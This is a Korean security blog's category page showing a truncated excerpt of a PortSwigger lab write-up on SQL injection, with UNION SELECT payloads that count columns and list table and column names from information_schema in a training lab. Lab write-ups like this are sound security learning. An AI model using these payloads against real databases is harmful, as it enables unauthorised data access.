본문 바로가기

수호의 메모장

검색하기
수호의 메모장
프로필사진 수호-_-

  • 분류 전체보기 (14)
    • ETC (1)
    • CSE (0)
      • BOJ (0)
    • Security (9)
      • Reverse Engineering (5)
      • System Hacking (2)
      • Tryhackme (1)
      • Portswigger (1)
Guestbook
Notice
Recent Posts
Recent Comments
Link
«   2025/05   »
일 월 화 수 목 금 토
1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30 31
Tags
  • NtQuerySystemInformation
more
Archives
Today
Total
관리 메뉴
  • 글쓰기
  • 방명록
  • RSS
  • 관리

목록Security/Portswigger (1)

수호의 메모장

Lab: SQL injection attack, listing the database contents on non-Oracle databases

Pets 파라미터에 SQL Injection 취약점이 존재한다. ' UNION SELECT null, null -- 위 페이로드를 통해 칼럼 수가 2임을 알 수 있다. ' UNION SELECT table_name, null from information_schema.tables -- 위 페이로드를 통해 table_name 들을 가지고 올 수 있다. 위 같은 경우 'users_zpyjut' table이 우리에게 있어 흥미로운 테이블임을 알 수 있다. 위 테이블을 대상으로 앞으로 SQL Injection을 진행할 예정이다. ' UNION SELECT column_name, null from information_schema.columns where table_name= 'users_zpyjut' -- 위 ..

Security/Portswigger 2023. 12. 8. 15:52
이전 Prev 1 Next 다음

Blog is powered by kakao / Designed by Tistory

티스토리툴바